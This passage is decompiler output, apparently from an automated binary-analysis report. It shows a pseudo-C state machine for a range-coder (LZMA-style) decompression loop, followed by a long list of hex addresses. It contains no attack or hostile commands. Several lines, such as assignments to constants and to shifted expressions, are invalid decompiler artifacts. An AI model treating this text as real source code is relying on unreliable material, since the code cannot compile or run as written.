							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                          0x00000000
                                          0x00406c71
                                          0x00406c71
                                          0x00406c75
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d3b
                                          0x00406c1c
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406f91
                                          0x00406f91
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00407007
                                          0x00407007
                                          0x0040700d
                                          0x0040700d
                                          0x00000000
                                          0x00406fe2
                                          0x00406fe2
                                          0x00406fe6
                                          0x00407195
                                          0x00000000
                                          0x00407195
                                          0x00406ff2
                                          0x00406ff9
                                          0x00407001
                                          0x00407004
                                          0x00000000
                                          0x00407004
                                          0x00406c7b
                                          0x00406c7f
                                          0x004071c0
                                          0x004071c0
                                          0x004071c3
                                          0x004071c7
                                          0x004071c7
                                          0x00406c85
                                          0x00406c8b
                                          0x00406c8e
                                          0x00406c92
                                          0x00406c95
                                          0x00406c99
                                          0x0040715f
                                          0x004071ab
                                          0x004071b3
                                          0x004071ba
                                          0x004071bc
                                          0x00000000
                                          0x004071bc
                                          0x00406c9f
                                          0x00406ca2
                                          0x00406ca8
                                          0x00406caa
                                          0x00406caa
                                          0x00406cad
                                          0x00406cb0
                                          0x00406cb3
                                          0x00406cb6
                                          0x00406cb9
                                          0x00406cbc
                                          0x00406cbd
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cc2
                                          0x00406cc5
                                          0x00406cc8
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406cce
                                          0x00406cd0
                                          0x00406cd0
                                          0x00406cd3
                                          0x00406cd3
                                          0x00406cd3
                                          0x004067a9
                                          0x004067a9
                                          0x004067b2
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x00000000
                                          0x004067c3
                                          0x00000000
                                          0x00000000
                                          0x004067cc
                                          0x004067cf
                                          0x004067d2
                                          0x004067d6
                                          0x00000000
                                          0x00000000
                                          0x004067dc
                                          0x004067df
                                          0x004067e1
                                          0x004067e2
                                          0x004067e5
                                          0x004067e7
                                          0x004067e8
                                          0x004067ea
                                          0x004067ed
                                          0x004067f2
                                          0x004067f7
                                          0x00406800
                                          0x00406813
                                          0x00406816
                                          0x00406822
                                          0x0040684a
                                          0x0040684c
                                          0x0040685a
                                          0x0040685a
                                          0x0040685e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040684e
                                          0x0040684e
                                          0x00406851
                                          0x00406852
                                          0x00406852
                                          0x00000000
                                          0x0040684e
                                          0x00406828
                                          0x0040682d
                                          0x0040682d
                                          0x00406836
                                          0x0040683e
                                          0x00406841
                                          0x00000000
                                          0x00406847
                                          0x00406847
                                          0x00000000
                                          0x00406847
                                          0x00000000
                                          0x00406864
                                          0x00406864
                                          0x00406868
                                          0x00407114
                                          0x00000000
                                          0x00407114
                                          0x00406871
                                          0x00406881
                                          0x00406884
                                          0x00406887
                                          0x00406887
                                          0x00406887
                                          0x0040688a
                                          0x0040688e
                                          0x00000000
                                          0x00000000
                                          0x00406890
                                          0x00406896
                                          0x004068c0
                                          0x004068c6
                                          0x004068cd
                                          0x00000000
                                          0x004068cd
                                          0x0040689c
                                          0x0040689f
                                          0x004068a4
                                          0x004068a4
                                          0x004068af
                                          0x004068b7
                                          0x004068ba
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004068ff
                                          0x00406905
                                          0x00406908
                                          0x00406915
                                          0x0040691d
                                          0x00000000
                                          0x00000000
                                          0x004068d4
                                          0x004068d4
                                          0x004068d8
                                          0x00407123
                                          0x00000000
                                          0x00407123
                                          0x004068e4
                                          0x004068ef
                                          0x004068ef
                                          0x004068ef
                                          0x004068f2
                                          0x004068f5
                                          0x004068f8
                                          0x004068fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406925
                                          0x00406927
                                          0x0040692a
                                          0x0040699b
                                          0x0040699e
                                          0x004069a1
                                          0x004069a8
                                          0x004069b2
                                          0x00000000
                                          0x004069b2
                                          0x0040692c
                                          0x00406930
                                          0x00406933
                                          0x00406935
                                          0x00406938
                                          0x0040693b
                                          0x0040693d
                                          0x00406940
                                          0x00406942
                                          0x00406947
                                          0x0040694a
                                          0x0040694d
                                          0x00406951
                                          0x00406958
                                          0x0040695b
                                          0x00406962
                                          0x00406966
                                          0x0040696e
                                          0x0040696e
                                          0x0040696e
                                          0x00406968
                                          0x00406968
                                          0x00406968
                                          0x0040695d
                                          0x0040695d
                                          0x0040695d
                                          0x00406972
                                          0x00406975
                                          0x00406993
                                          0x00406995
                                          0x00000000
                                          0x00406977
                                          0x00406977
                                          0x0040697a
                                          0x0040697d
                                          0x00406980
                                          0x00406982
                                          0x00406982
                                          0x00406982
                                          0x00406985
                                          0x00406988
                                          0x0040698a
                                          0x0040698b
                                          0x0040698e
                                          0x00000000
                                          0x0040698e
                                          0x00000000
                                          0x00406bc4
